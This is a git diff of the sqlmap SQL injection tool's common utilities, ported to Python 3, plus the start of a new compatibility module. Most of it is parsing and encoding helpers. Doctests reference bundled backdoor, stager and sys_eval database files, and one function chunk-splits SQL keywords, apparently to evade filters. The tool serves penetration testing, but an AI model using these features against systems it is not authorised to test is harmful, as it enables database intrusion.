quote(s, safe): s = s or '' # Triggers on non-ascii characters - another option would be: - # urllib.quote(s.replace('%', '')) != s.replace('%', '') + # _urllib.parse.quote(s.replace('%', '')) != s.replace('%', '') # which would trigger on all %-characters, e.g. "&". - if s.encode("ascii", "replace") != s or forceQuote: - return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe) + if getUnicode(s).encode("ascii", "replace") != s or forceQuote: + s = _urllib.parse.quote(getBytes(s), safe=safe) return s username = quote(parts.username, '') @@ -2932,23 +4615,30 @@ def quote(s, safe): query = quote(parts.query, safe="&=") # put everything back together - netloc = hostname + netloc = getText(hostname) if username or password: netloc = '@' + netloc if password: netloc = ':' + password + netloc netloc = username + netloc - if parts.port: - netloc += ':' + str(parts.port) + try: + port = parts.port + except: + port = None + + if port: + netloc += ':' + str(port) - return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) + return getText(_urllib.parse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment]) or url) def isAdminFromPrivileges(privileges): """ - Inspects privileges to see if those are comming from an admin user + Inspects privileges to see if those are coming from an admin user """ + privileges = privileges or [] + # In PostgreSQL the usesuper privilege means that the # user is DBA retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges) @@ -2967,26 +4657,29 @@ def isAdminFromPrivileges(privileges): # In Firebird there is no specific privilege that means # that the user is DBA - # TODO: confirm retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE"))) return retVal -def findPageForms(content, url, raise_=False, addToTargets=False): +def findPageForms(content, url, raiseException=False, addToTargets=False): """ - Parses given page content for possible forms + Parses given page content for possible forms (Note: still not implemented for Python3) + + >>> findPageForms('
', 'http://www.site.com') == set([('http://www.site.com/input.php', 'POST', 'id=1', None, None)]) + True """ - class _(StringIO): + class _(six.StringIO, object): def __init__(self, content, url): - StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) + super(_, self).__init__(content) self._url = url + def geturl(self): return self._url if not content: errMsg = "can't parse forms as the page content appears to be blank" - if raise_: + if raiseException: raise SqlmapGenericException(errMsg) else: logger.debug(errMsg) @@ -2998,121 +4691,222 @@ def geturl(self): try: forms = ParseResponse(response, backwards_compat=False) except ParseError: - warnMsg = "badly formed HTML at the given url ('%s'). Going to filter it" % url - logger.warning(warnMsg) - response.seek(0) - filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl()) + if re.search(r"(?i)>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target.com/images/page2.php') + True + >>> checkSameHost('http://www.target.com/page1.php?id=1', 'http://www.target2.com/images/page2.php') + False + """ - return retVal + if not urls: + return None + elif len(urls) == 1: + return True + else: + def _(value): + if value and not re.search(r"\A\w+://", value): + value = "http://%s" % value + return value + + first = _urllib.parse.urlparse(_(urls[0]) or "").hostname or "" + first = re.sub(r"(?i)\Awww\.", "", first) + + for url in urls[1:]: + current = _urllib.parse.urlparse(_(url) or "").hostname or "" + current = re.sub(r"(?i)\Awww\.", "", current) + + if current != first: + return False + + return True def getHostHeader(url): """ Returns proper Host header value for a given target URL + + >>> getHostHeader('http://www.target.com/vuln.php?id=1') + 'www.target.com' """ retVal = url if url: - retVal = urlparse.urlparse(url).netloc + retVal = _urllib.parse.urlparse(url).netloc - if re.search("http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) + if re.search(r"http(s)?://\[.+\]", url, re.I): + retVal = extractRegexResult(r"http(s)?://\[(?P.+)\]", url) elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): retVal = retVal.split(':')[0] + if retVal and retVal.count(':') > 1 and not any(_ in retVal for _ in ('[', ']')): + retVal = "[%s]" % retVal + return retVal -def checkDeprecatedOptions(args): +def checkOldOptions(args): """ - Checks for deprecated options + Checks for obsolete/deprecated options """ for _ in args: - if _ in DEPRECATED_OPTIONS: - errMsg = "switch/option '%s' is deprecated" % _ - if DEPRECATED_OPTIONS[_]: - errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] + _ = _.split('=')[0].strip() + if _ in OBSOLETE_OPTIONS: + errMsg = "switch/option '%s' is obsolete" % _ + if OBSOLETE_OPTIONS[_]: + errMsg += " (hint: %s)" % OBSOLETE_OPTIONS[_] raise SqlmapSyntaxException(errMsg) + elif _ in DEPRECATED_OPTIONS: + warnMsg = "switch/option '%s' is deprecated" % _ + if DEPRECATED_OPTIONS[_]: + warnMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] + logger.warning(warnMsg) + +def checkSystemEncoding(): + """ + Checks for problematic encodings + """ + + if sys.getdefaultencoding() == "cp720": + try: + codecs.lookup("cp720") + except LookupError: + errMsg = "there is a known Python issue (#1616979) related " + errMsg += "to support for charset 'cp720'. Please visit " + errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' " + errMsg += "and follow the instructions to be able to fix it" + logger.critical(errMsg) + + warnMsg = "temporary switching to charset 'cp1256'" + logger.warning(warnMsg) + + _reload_module(sys) + sys.setdefaultencoding("cp1256") def evaluateCode(code, variables=None): """ Executes given python code given in a string form + + >>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"] + 1 """ try: exec(code, variables) except KeyboardInterrupt: raise - except Exception, ex: - errMsg = "an error occured while evaluating provided code ('%s'). " % ex + except Exception as ex: + errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) raise SqlmapGenericException(errMsg) def serializeObject(object_): """ Serializes given object + + >>> type(serializeObject([1, 2, 3, ('a', 'b')])) == str + True """ return base64pickle(object_) @@ -3120,6 +4914,11 @@ def serializeObject(object_): def unserializeObject(value): """ Unserializes object from given serialized form + + >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] + True + >>> unserializeObject('gAJVBmZvb2JhcnEBLg==') + 'foobar' """ return base64unpickle(value) if value else None @@ -3141,6 +4940,9 @@ def incrementCounter(technique): def getCounter(technique): """ Returns query counter for a given technique + + >>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED) + 1 """ return kb.counters.get(technique, 0) @@ -3148,6 +4950,9 @@ def getCounter(technique): def applyFunctionRecursively(value, function): """ Applies function recursively through list-like structures + + >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0) + [True, True, [True, True, [True]], False] """ if isListLike(value): @@ -3157,26 +4962,58 @@ def applyFunctionRecursively(value, function): return retVal -def decodeHexValue(value): +def decodeDbmsHexValue(value, raw=False): """ Returns value decoded from DBMS specific hexadecimal representation + + >>> decodeDbmsHexValue('3132332031') == u'123 1' + True + >>> decodeDbmsHexValue('31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('00310032003300200031') == u'123 1' + True + >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1' + True + >>> decodeDbmsHexValue('313233203') == u'123 ?' + True + >>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2'] + True + >>> decodeDbmsHexValue('5.1.41') == u'5.1.41' + True """ retVal = value def _(value): retVal = value - if value and isinstance(value, basestring) and len(value) % 2 == 0: - retVal = hexdecode(retVal) + if value and isinstance(value, six.string_types): + value = value.strip() - if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): - try: - retVal = retVal.decode("utf-16-le") - except UnicodeDecodeError: - pass + if len(value) % 2 != 0: + retVal = (decodeHex(value[:-1]) + b'?') if len(value) > 1 else value + singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) + else: + retVal = decodeHex(value) + + if not raw: + if not kb.binaryField: + if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): + try: + retVal = retVal.decode("utf-16-le") + except UnicodeDecodeError: + pass - if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") + elif Backend.getIdentifiedDbms() in (DBMS.HSQLDB, DBMS.H2): + try: + retVal = retVal.decode("utf-16-be") + except UnicodeDecodeError: + pass + + if not isinstance(retVal, six.text_type): + retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING) + + if u"\x00" in retVal: + retVal = retVal.replace(u"\x00", u"") return retVal @@ -3190,6 +5027,17 @@ def _(value): def extractExpectedValue(value, expected): """ Extracts and returns expected value by a given type + + >>> extractExpectedValue(['1'], EXPECTED.BOOL) + True + >>> extractExpectedValue(['17'], EXPECTED.BOOL) + True + >>> extractExpectedValue(['0'], EXPECTED.BOOL) + False + >>> extractExpectedValue('1', EXPECTED.INT) + 1 + >>> extractExpectedValue('7\\xb9645', EXPECTED.INT) is None + True """ if expected: @@ -3200,19 +5048,23 @@ def extractExpectedValue(value, expected): elif expected == EXPECTED.BOOL: if isinstance(value, int): value = bool(value) - elif isinstance(value, basestring): + elif isinstance(value, six.string_types): value = value.strip().lower() if value in ("true", "false"): value = value == "true" - elif value in ("1", "-1"): - value = True - elif value == "0": + elif value in ('t', 'f'): + value = value == 't' + elif value == '0': value = False + elif re.search(r"\A-?[1-9]\d*\Z", value): + value = True else: value = None elif expected == EXPECTED.INT: - if isinstance(value, basestring): - value = int(value) if value.isdigit() else None + try: + value = int(value) + except: + value = None return value @@ -3221,19 +5073,25 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - conf.hashDB.write(_, value, serialize) + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): """ Helper function for restoring session data from HashDB """ - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - _ = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any([conf.flushSession, conf.freshQueries])) else None - if not kb.inferenceMode and not kb.fileReadMode and _ and PARTIAL_VALUE_MARKER in _: - _ = None - return _ + retVal = None + + if conf.hashDB: + _ = '|'.join((str(_) if not isinstance(_, six.string_types) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) + retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None + + if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, six.string_types) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): + retVal = None + + return retVal def resetCookieJar(cookieJar): """ @@ -3244,52 +5102,118 @@ def resetCookieJar(cookieJar): cookieJar.clear() else: try: - cookieJar.load(conf.loadCookies) + if not cookieJar.filename: + infoMsg = "loading cookies from '%s'" % conf.loadCookies + logger.info(infoMsg) + + content = readCachedFileContent(conf.loadCookies) + content = re.sub("(?im)^#httpOnly_", "", content) + lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#')) + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR) + os.close(handle) + + # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html + with openFile(filename, "w+") as f: + f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) + for line in lines: + _ = line.split("\t") + if len(_) == 7: + _[4] = FORCE_COOKIE_EXPIRATION_TIME + f.write("\n%s" % "\t".join(_)) + + cookieJar.filename = filename + + cookieJar.load(cookieJar.filename, ignore_expires=True) + + for cookie in cookieJar: + if getattr(cookie, "expires", MAX_INT) < time.time(): + warnMsg = "cookie '%s' has expired" % cookie + singleTimeWarnMessage(warnMsg) + cookieJar.clear_expired_cookies() - except cookielib.LoadError, msg: + + if not cookieJar._cookies: + errMsg = "no valid cookies found" + raise SqlmapGenericException(errMsg) + + except Exception as ex: errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % msg + errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", r"\g<1>", getSafeExString(ex)) raise SqlmapGenericException(errMsg) def decloakToTemp(filename): """ Decloaks content of a given file to a temporary file with similar name and extension + + NOTE: using in-memory decloak() in docTests because of the "problem" on Windows platform + + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.asp_")).startswith(b'<%') + True + >>> decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoors", "backdoor.asp_")).startswith(b'<%') + True + >>> b'sys_eval' in decloak(os.path.join(paths.SQLMAP_UDF_PATH, "postgresql", "linux", "64", "11", "lib_postgresqludf_sys.so_")) + True """ content = decloak(filename) - _ = os.path.split(filename[:-1])[-1] - prefix, suffix = os.path.splitext(_) - prefix = prefix.split(os.extsep)[0] + + parts = os.path.split(filename[:-1])[-1].split('.') + prefix, suffix = parts[0], '.' + parts[-1] handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) os.close(handle) - with open(filename, "w+b") as f: + + with openFile(filename, "w+b", encoding=None) as f: f.write(content) + return filename def prioritySortColumns(columns): """ Sorts given column names by length in ascending order while those containing string 'id' go first + + >>> prioritySortColumns(['password', 'userid', 'name', 'id']) + ['id', 'userid', 'name', 'password'] """ - _ = lambda x: x and "id" in x.lower() - return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) + recompile = re.compile(r"^id|id$", re.I) + + return sorted(columns, key=lambda col: ( + not (col and recompile.search(col)), + len(col) + )) def getRequestHeader(request, name): """ Solving an issue with an urllib2 Request header case sensitivity - Reference: http://bugs.python.org/issue2275 + # Reference: http://bugs.python.org/issue2275 + + >>> _ = lambda _: _ + >>> _.headers = {"FOO": "BAR"} + >>> _.header_items = lambda: _.headers.items() + >>> getText(getRequestHeader(_, "foo")) + 'BAR' """ retVal = None - if request and name: - retVal = max(request.get_header(_) if name.upper() == _.upper() else None for _ in request.headers.keys()) + + if request and request.headers and name: + _ = name.upper() + retVal = max(getBytes(value if _ == key.upper() else "") for key, value in request.header_items()) or None + return retVal def isNumber(value): """ Returns True if the given value is a number-like object + + >>> isNumber(1) + True + >>> isNumber('0') + True + >>> isNumber('foobar') + False """ try: @@ -3303,6 +5227,11 @@ def zeroDepthSearch(expression, value): """ Searches occurrences of value inside expression at 0-depth level regarding the parentheses + + >>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:] + 'FROM DUAL' + >>> _ = "a(b; c),d;e"; _[zeroDepthSearch(_, "[;, ]")[0]:] + ',d;e' """ retVal = [] @@ -3313,14 +5242,21 @@ def zeroDepthSearch(expression, value): depth += 1 elif expression[index] == ')': depth -= 1 - elif depth == 0 and expression[index:index + len(value)] == value: - retVal.append(index) + elif depth == 0: + if value.startswith('[') and value.endswith(']'): + if re.search(value, expression[index:index + 1]): + retVal.append(index) + elif expression[index:index + len(value)] == value: + retVal.append(index) return retVal def splitFields(fields, delimiter=','): """ - Returns list of fields splitted by delimiter + Returns list of (0-depth) fields splitted by delimiter + + >>> splitFields('foo, bar, max(foo, bar)') + ['foo', 'bar', 'max(foo,bar)'] """ fields = fields.replace("%s " % delimiter, delimiter) @@ -3328,10 +5264,14 @@ def splitFields(fields, delimiter=','): commas.extend(zeroDepthSearch(fields, ',')) commas = sorted(commas) - return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])] + return [fields[x + 1:y] for (x, y) in _zip(commas, commas[1:])] def pollProcess(process, suppress_errors=False): - while True: + """ + Checks for process status (prints . if still running) + """ + + while process: dataToStdout(".") time.sleep(1) @@ -3347,3 +5287,362 @@ def pollProcess(process, suppress_errors=False): dataToStdout(" quit unexpectedly with return code %d\n" % returncode) break + +def parseRequestFile(reqFile, checkParams=True): + """ + Parses WebScarab and Burp logs and adds results to the target URL list + + >>> handle, reqFile = tempfile.mkstemp(suffix=".req") + >>> content = b"POST / HTTP/1.0\\nUser-agent: foobar\\nHost: www.example.com\\n\\nid=1\\n" + >>> _ = os.write(handle, content) + >>> os.close(handle) + >>> next(parseRequestFile(reqFile)) == ('http://www.example.com:80/', 'POST', 'id=1', None, (('User-agent', 'foobar'), ('Host', 'www.example.com'))) + True + """ + + def _parseWebScarabLog(content): + """ + Parses WebScarab logs (POST method not supported) + """ + + if WEBSCARAB_SPLITTER not in content: + return + + reqResList = content.split(WEBSCARAB_SPLITTER) + + for request in reqResList: + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) + cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) + + if not method or not url: + logger.debug("not a valid WebScarab log data") + continue + + if method.upper() == HTTPMETHOD.POST: + warnMsg = "POST requests from WebScarab logs aren't supported " + warnMsg += "as their body content is stored in separate files. " + warnMsg += "Nevertheless you can use -r to load them individually." + logger.warning(warnMsg) + continue + + if not (conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, method, None, cookie, tuple()) + + def _parseBurpLog(content): + """ + Parses Burp logs + """ + + if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): + if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + reqResList = [] + for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + port, request = match.groups() + try: + request = decodeBase64(request, binary=False) + except (binascii.Error, TypeError): + continue + _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) + if _: + host = _.group(0).strip() + if not re.search(r":\d+\Z", host) and int(port) != 80: + request = request.replace(host, "%s:%d" % (host, int(port))) + reqResList.append(request) + else: + reqResList = [content] + else: + reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) + + for match in reqResList: + request = match if isinstance(match, six.string_types) else match.group(1) + request = re.sub(r"\A[^\w]+", "", request) + schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) + + if schemePort: + scheme = schemePort.group(1) + port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) + else: + scheme, port = None, None + + if "HTTP/" not in request: + continue + + if re.search(r"^[\n]*%s[^?]*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): + if not re.search(r"^[\n]*%s[^\n]*\*[^\n]*\sHTTP\/" % HTTPMETHOD.GET, request, re.I | re.M): + continue + + getPostReq = False + forceBody = False + url = None + host = None + method = None + data = None + cookie = None + params = False + newline = None + lines = request.split('\n') + headers = [] + + for index in xrange(len(lines)): + line = lines[index] + + if not line.strip() and index == len(lines) - 1: + break + + line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line) + + newline = "\r\n" if line.endswith('\r') else '\n' + line = line.strip('\r') + match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None + + if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None: + data = "" + params = True + + elif match: + method = match.group(1) + url = match.group(2) + + if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): + params = True + + getPostReq = True + + # POST parameters + elif data is not None and params: + data += "%s%s" % (line, newline) + + # GET parameters + elif "?" in line and "=" in line and ": " not in line: + params = True + + # Headers + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") + + # Note: overriding values with --headers '...' + match = re.search(r"(?i)\b(%s): ([^\n]*)" % re.escape(key), conf.headers or "") + if match: + key, value = match.groups() + + # Cookie and Host headers + if key.upper() == HTTP_HEADER.COOKIE.upper(): + cookie = value + elif key.upper() == HTTP_HEADER.HOST.upper(): + if '://' in value: + scheme, value = value.split('://')[:2] + + port = extractRegexResult(r":(?P\d+)\Z", value) + if port: + host = value[:-(1 + len(port))] + else: + host = value + + # Avoid to add a static content length header to + # headers and consider the following lines as + # POSTed data + if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + forceBody = True + params = True + + # Avoid proxy and connection type related headers + elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION, HTTP_HEADER.IF_MODIFIED_SINCE, HTTP_HEADER.IF_NONE_MATCH): + headers.append((getUnicode(key), getUnicode(value))) + + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): + params = True + + data = data.rstrip("\r\n") if data else data + + if getPostReq and (params or cookie or not checkParams): + if not port and hasattr(scheme, "lower") and scheme.lower() == "https": + port = "443" + elif not scheme and port == "443": + scheme = "https" + + if conf.forceSSL: + scheme = "https" + port = port or "443" + + if not host: + errMsg = "invalid format of a request file" + raise SqlmapSyntaxException(errMsg) + + if not url.startswith("http"): + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + scheme = None + port = None + + if not (conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, conf.method or method, data, cookie, tuple(headers)) + + content = readCachedFileContent(reqFile) + + if conf.scope: + logger.info("using regular expression '%s' for filtering targets" % conf.scope) + + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + for target in _parseBurpLog(content): + yield target + + for target in _parseWebScarabLog(content): + yield target + +def getSafeExString(ex, encoding=None): + """ + Safe way how to get the proper exception represtation as a string + + >>> getSafeExString(SqlmapBaseException('foobar')) == 'foobar' + True + >>> getSafeExString(OSError(0, 'foobar')) == 'OSError: foobar' + True + """ + + retVal = None + + if getattr(ex, "message", None): + retVal = ex.message + elif getattr(ex, "msg", None): + retVal = ex.msg + elif getattr(ex, "args", None): + for candidate in ex.args[::-1]: + if isinstance(candidate, six.string_types): + retVal = candidate + break + + if retVal is None: + retVal = str(ex) + elif not isinstance(ex, SqlmapBaseException): + retVal = "%s: %s" % (type(ex).__name__, retVal) + + return getUnicode(retVal or "", encoding=encoding).strip() + +def safeVariableNaming(value): + """ + Returns escaped safe-representation of a given variable name that can be used in Python evaluated code + + >>> safeVariableNaming("class.id") == "EVAL_636c6173732e6964" + True + """ + + if value in keyword.kwlist or re.search(r"\A[^a-zA-Z]|[^\w]", value): + value = "%s%s" % (EVALCODE_ENCODED_PREFIX, getUnicode(binascii.hexlify(getBytes(value)))) + + return value + +def unsafeVariableNaming(value): + """ + Returns unescaped safe-representation of a given variable name + + >>> unsafeVariableNaming("EVAL_636c6173732e6964") == "class.id" + True + """ + + if value.startswith(EVALCODE_ENCODED_PREFIX): + value = decodeHex(value[len(EVALCODE_ENCODED_PREFIX):], binary=False) + + return value + +def firstNotNone(*args): + """ + Returns first not-None value from a given list of arguments + + >>> firstNotNone(None, None, 1, 2, 3) + 1 + """ + + retVal = None + + for _ in args: + if _ is not None: + retVal = _ + break + + return retVal + +def removePostHintPrefix(value): + """ + Remove POST hint prefix from a given value (name) + + >>> removePostHintPrefix("JSON id") + 'id' + >>> removePostHintPrefix("id") + 'id' + """ + + return re.sub(r"\A(%s) " % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), "", value) + + +def chunkSplitPostData(data): + """ + Convert POST data to chunked transfer-encoded data (Note: splitting done by SQL keywords) + + >>> random.seed(0) + >>> chunkSplitPostData("SELECT username,password FROM users") + '5;4Xe90\\r\\nSELEC\\r\\n3;irWlc\\r\\nT u\\r\\n1;eT4zO\\r\\ns\\r\\n5;YB4hM\\r\\nernam\\r\\n9;2pUD8\\r\\ne,passwor\\r\\n3;mp07y\\r\\nd F\\r\\n5;8RKXi\\r\\nROM u\\r\\n4;MvMhO\\r\\nsers\\r\\n0\\r\\n\\r\\n' + """ + + length = len(data) + retVal = [] + index = 0 + + while index < length: + chunkSize = randomInt(1) + + if index + chunkSize >= length: + chunkSize = length - index + + salt = randomStr(5, alphabet=string.ascii_letters + string.digits) + + while chunkSize: + candidate = data[index:index + chunkSize] + + if re.search(r"\b%s\b" % '|'.join(HTTP_CHUNKED_SPLIT_KEYWORDS), candidate, re.I): + chunkSize -= 1 + else: + break + + index += chunkSize + + # Append to list instead of recreating the string + retVal.append("%x;%s\r\n" % (chunkSize, salt)) + retVal.append("%s\r\n" % candidate) + + retVal.append("0\r\n\r\n") + + return "".join(retVal) + +def checkSums(): + """ + Validate the content of the digest file (i.e. sha256sums.txt) + >>> checkSums() + True + """ + + retVal = True + + if paths.get("DIGEST_FILE"): + for entry in getFileItems(paths.DIGEST_FILE): + match = re.search(r"([0-9a-f]+)\s+([^\s]+)", entry) + if match: + expected, filename = match.groups() + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep) + if not checkFile(filepath, False): + continue + with open(filepath, "rb") as f: + content = f.read() + if b'\0' not in content: + content = content.replace(b"\r\n", b"\n") + if not hashlib.sha256(content).hexdigest() == expected: + retVal &= False + break + + return retVal diff --git a/lib/core/compat.py b/lib/core/compat.py new file mode 100644 index 00000000000..7020863da46 --- /dev/null +++ b/lib/core/compat.py @@ -0,0 +1,429 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from __future__ import division + +import codecs +import binascii +import functools +import io +import math +import os +import random +import re +import sys +import time +import uuid + +class WichmannHill(random.Random): + """ + Reference: https://svn.python.org/projects/python/trunk/Lib/random.py + """ + + VERSION = 1 # used by getstate/setstate + + def seed(self, a=None): + """Initialize internal state from hashable object. + + None or no argument seeds from current time or from an operating + system specific randomness source if available. + + If a is not None or an int or long, hash(a) is used instead. + + If a is an int or long, a is used directly. Distinct values between + 0 and 27814431486575L inclusive are guaranteed to yield distinct + internal states (this guarantee is specific to the default + Wichmann-Hill generator). + """ + + if a is None: + try: + a = int(binascii.hexlify(os.urandom(16)), 16) + except NotImplementedError: + a = int(time.time() * 256) # use fractional seconds + + if not isinstance(a, int): + a = hash(a) + + a, x = divmod(a, 30268) + a, y = divmod(a, 30306) + a, z = divmod(a, 30322) + self._seed = int(x) + 1, int(y) + 1, int(z) + 1 + + self.gauss_next = None + + def random(self): + """Get the next random number in the range [0.0, 1.0).""" + + # Wichman-Hill random number generator. + # + # Wichmann, B. A. & Hill, I. D. (1982) + # Algorithm AS 183: + # An efficient and portable pseudo-random number generator + # Applied Statistics 31 (1982) 188-190 + # + # see also: + # Correction to Algorithm AS 183 + # Applied Statistics 33 (1984) 123 + # + # McLeod, A. I. (1985) + # A remark on Algorithm AS 183 + # Applied Statistics 34 (1985),198-200 + + # This part is thread-unsafe: + # BEGIN CRITICAL SECTION + x, y, z = self._seed + x = (171 * x) % 30269 + y = (172 * y) % 30307 + z = (170 * z) % 30323 + self._seed = x, y, z + # END CRITICAL SECTION + + # Note: on a platform using IEEE-754 double arithmetic, this can + # never return 0.0 (asserted by Tim; proof too long for a comment). + return (x / 30269.0 + y / 30307.0 + z / 30323.0) % 1.0 + + def getstate(self): + """Return internal state; can be passed to setstate() later.""" + return self.VERSION, self._seed, self.gauss_next + + def setstate(self, state): + """Restore internal state from object returned by getstate().""" + version = state[0] + if version == 1: + version, self._seed, self.gauss_next = state + else: + raise ValueError("state with version %s passed to " + "Random.setstate() of version %s" % + (version, self.VERSION)) + + def jumpahead(self, n): + """Act as if n calls to random() were made, but quickly. + + n is an int, greater than or equal to 0. + + Example use: If you have 2 threads and know that each will + consume no more than a million random numbers, create two Random + objects r1 and r2, then do + r2.setstate(r1.getstate()) + r2.jumpahead(1000000) + Then r1 and r2 will use guaranteed-disjoint segments of the full + period. + """ + + if n < 0: + raise ValueError("n must be >= 0") + x, y, z = self._seed + x = int(x * pow(171, n, 30269)) % 30269 + y = int(y * pow(172, n, 30307)) % 30307 + z = int(z * pow(170, n, 30323)) % 30323 + self._seed = x, y, z + + def __whseed(self, x=0, y=0, z=0): + """Set the Wichmann-Hill seed from (x, y, z). + + These must be integers in the range [0, 256). + """ + + if not type(x) == type(y) == type(z) == int: + raise TypeError('seeds must be integers') + if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256): + raise ValueError('seeds must be in range(0, 256)') + if 0 == x == y == z: + # Initialize from current time + t = int(time.time() * 256) + t = int((t & 0xffffff) ^ (t >> 24)) + t, x = divmod(t, 256) + t, y = divmod(t, 256) + t, z = divmod(t, 256) + # Zero is a poor seed, so substitute 1 + self._seed = (x or 1, y or 1, z or 1) + + self.gauss_next = None + + def whseed(self, a=None): + """Seed from hashable object's hash code. + + None or no argument seeds from current time. It is not guaranteed + that objects with distinct hash codes lead to distinct internal + states. + + This is obsolete, provided for compatibility with the seed routine + used prior to Python 2.1. Use the .seed() method instead. + """ + + if a is None: + self.__whseed() + return + a = hash(a) + a, x = divmod(a, 256) + a, y = divmod(a, 256) + a, z = divmod(a, 256) + x = (x + a) % 256 or 1 + y = (y + a) % 256 or 1 + z = (z + a) % 256 or 1 + self.__whseed(x, y, z) + +def patchHeaders(headers): + if headers is not None and not hasattr(headers, "headers"): + if isinstance(headers, dict): + class _(dict): + def __getitem__(self, key): + for key_ in self: + if key_.lower() == key.lower(): + return super(_, self).__getitem__(key_) + + raise KeyError(key) + + def get(self, key, default=None): + try: + return self[key] + except KeyError: + return default + + headers = _(headers) + + headers.headers = ["%s: %s\r\n" % (header, headers[header]) for header in headers] + + return headers + +def cmp(a, b): + """ + >>> cmp("a", "b") + -1 + >>> cmp(2, 1) + 1 + """ + + if a < b: + return -1 + elif a > b: + return 1 + else: + return 0 + +# Reference: 